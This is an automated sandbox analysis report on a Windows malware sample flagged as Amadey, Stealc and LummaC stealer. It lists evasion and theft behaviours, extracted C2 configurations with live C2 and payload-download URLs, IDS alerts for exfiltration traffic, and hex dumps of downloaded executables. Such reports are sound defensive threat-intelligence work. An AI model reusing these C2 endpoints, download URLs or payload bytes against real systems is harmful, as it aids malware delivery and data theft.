Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1565518
MD5: 27a3277f6daec8e2369a88cea407fb46
SHA1: c7da43b9bc1a51aa28cda592d8266e17057ab6b7
SHA256: ba82209b941924aeb6196fac31a5e2d13193f49be26163683bf29a293b3fcec0
Tags: exeuser-Bitsight
Infos:

Detection

Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected AntiVM3
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

barindex
Source: file.exe Avira: detected
Source: http://185.215.113.206? Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/6802601040/SxQyhJr.exe Avira URL Cloud: Label: phishing
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000002.00000003.1701196442.00000000049F0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: a6f0d09f38.exe.7620.13.memstrmin Malware Configuration Extractor: LummaC {"C2 url": "https://atten-supporse.biz:443/api", "Build Version": "LOGS11--LiveTraffi"}
Source: b5da647ae3.exe.5500.14.memstrmin Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "drum"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SxQyhJr[1].exe ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 57%
Source: file.exe Virustotal: Detection: 55% Perma Link
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SxQyhJr[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_cc3844a9-b
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49869 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49877 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49884 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49928 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49927 version: TLS 1.2
Source: Binary string: webauthn.pdb source: firefox.exe, 0000001C.00000003.2801056711.000001DEEBF8E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\applaunch.pdb@ source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\applaunch.pdb]q03f5 source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: SxQyhJr.exe, 00000007.00000002.2452771154.0000000006350000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbL source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: SxQyhJr.exe, 00000007.00000002.2452771154.0000000006350000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Windows\applaunch.pdbpdbnch.pdbdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\applaunch.pdb; source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.00000000052A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: webauthn.pdbGCTL source: firefox.exe, 0000001C.00000003.2801056711.000001DEEBF8E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: a6f0d09f38.exe, 0000000D.00000003.2893559626.00000000084E0000.00000004.00001000.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2987390171.00000000063D2000.00000040.00000800.00020000.00000000.sdmp, 8b82d73f70.exe, 00000020.00000002.2915080351.00000000003A2000.00000040.00000001.01000000.0000001A.sdmp, 8b82d73f70.exe, 00000020.00000003.2780938560.00000000050C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: mscorlib.pdbamD source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n4C:\Windows\applaunch.pdbd source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\applaunch.pdb]qKeyT source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: o.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: applaunch.pdbeP/ source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: applaunch.pdblaunch.pdbpdbnch.pdb.0.30319\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: symbols\exe\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb, source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbs1 source: AppLaunch.exe, 00000008.00000002.2944711279.00000000052A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbpdbtem.pdbU source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: oC:\Windows\Microsoft.NET\Framework\v4.0.30319\applaunch.pdbxX($ source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: %%.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbV source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .PDB source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.PDBp source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E0F07h 7_2_061E0EA8
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E169Fh 7_2_061E1618
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E169Fh 7_2_061E160A
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E0F07h 7_2_061E0E98
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E7A3Dh 7_2_061E7698
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E7A3Dh 7_2_061E7689
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E7A3Dh 7_2_061E77B4
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E0F07h 7_2_061E11DB
Source: firefox.exe Memory has grown: Private usage: 1MB later: 222MB

Networking

barindex
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49753 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49759
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49780 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49798 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49816 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49818 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49839 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49879 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49919 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49803 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49803 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49797 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49797 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49815 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49877 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49836 -> 104.21.16.9:443
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: https://atten-supporse.biz:443/api
Source: Malware configuration extractor IPs: 185.215.113.43
Source: unknown Network traffic detected: DNS query count 31
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:09 GMTContent-Type: application/octet-streamContent-Length: 1473536Last-Modified: Sat, 30 Nov 2024 02:41:31 GMTConnection: keep-aliveETag: "674a7b5b-167c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d2 79 4a 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 ec 15 00 00 8e 00 00 00 00 00 00 be 0b 16 00 00 20 00 00 00 20 16 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 16 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 0b 16 00 57 00 00 00 00 20 16 00 fe 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 16 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 eb 15 00 00 20 00 00 00 ec 15 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 fe 8a 00 00 00 20 16 00 00 8c 00 00 00 ee 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 16 00 00 02 00 00 00 7a 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0b 16 00 00 00 00 00 48 00 00 00 02 00 05 00 64 93 14 00 00 78 01 00 03 00 00 00 01 00 00 06 7c a8 00 00 e6 ea 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 73 04 00 00 06 25 6f 02 00 00 06 6f 03 00 00 06 2a b6 02 73 1a 00 00 0a 7d 01 00 00 04 02 7b 01 00 00 04 1b 6f 1b 00 00 0a 02 7b 01 00 00 04 28 08 00 00 06 28 1c 00 00 0a 6f 1d 00 00 0a 2a 1e 02 28 28 00 00 0a 2a 2e 73 06 00 00 06 80 02 00 00 04 2a 1e 02 28 29 00 00 0a 2a 46 03 6f 2a 00 00 0a 72 15 00 00 70 6f 2b 00 00 0a 2a ba 7e 04 00 00 04 3a 1e 00 00 00 72 ad 00 00 70 d0 06 00 00 02 28 23 00 00 0a 6f 33 00 00 0a 73 34 00 00 0a 80 04 00 00 04 7e 04 00 00 04 2a 1a 7e 05 00 00 04 2a 1e 02 80 05 00 00 04 2a 6a 28 0b 00 00 06 72 e9 00 00 70 7e 05 00 00 04 6f 35 00 00 0a 74 02 00 00 1b 2a 22 02 03 7d 27 00 00 04 2a 5e 02 0e 04 1f 18 62 03 1f 10 62 60 04 1e 62 60 05 60 7d 27 00 00 04 2a 72 02 20 00 00 00 ff 6e 03 1f 10 62 6a 60 04 1e 62 6a 60 05 6a 60 6d 7d 27 00 00 04 2a 66 03 02 28 18 00 00 06 02 28 19 00 00 06 02 28 16 00 00 06 73 10 00 00 06 2a 66 02 28 17 00 00 06 03 02 28 19 00 00 06 02 28 16 00 00 06 73 10 00 00 06 2a 66 02 28
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:17 GMTContent-Type: application/octet-streamContent-Length: 1864192Last-Modified: Sat, 30 Nov 2024 03:04:48 GMTConnection: keep-aliveETag: "674a80d0-1c7200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 42 33 47 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 e6 03 00 00 c2 00 00 00 00 00 00 00 c0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 49 00 00 04 00 00 3a 9b 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 60 05 00 70 00 00 00 00 50 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 61 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 05 00 00 10 00 00 00 58 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 50 05 00 00 02 00 00 00 68 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 60 05 00 00 02 00 00 00 6a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2a 00 00 70 05 00 00 02 00 00 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 69 6f 64 75 79 62 67 00 e0 19 00 00 d0 2f 00 00 dc 19 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 61 71 76 7a 76 63 69 00 10 00 00 00 b0 49 00 00 06 00 00 00 4a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 49 00 00 22 00 00 00 50 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 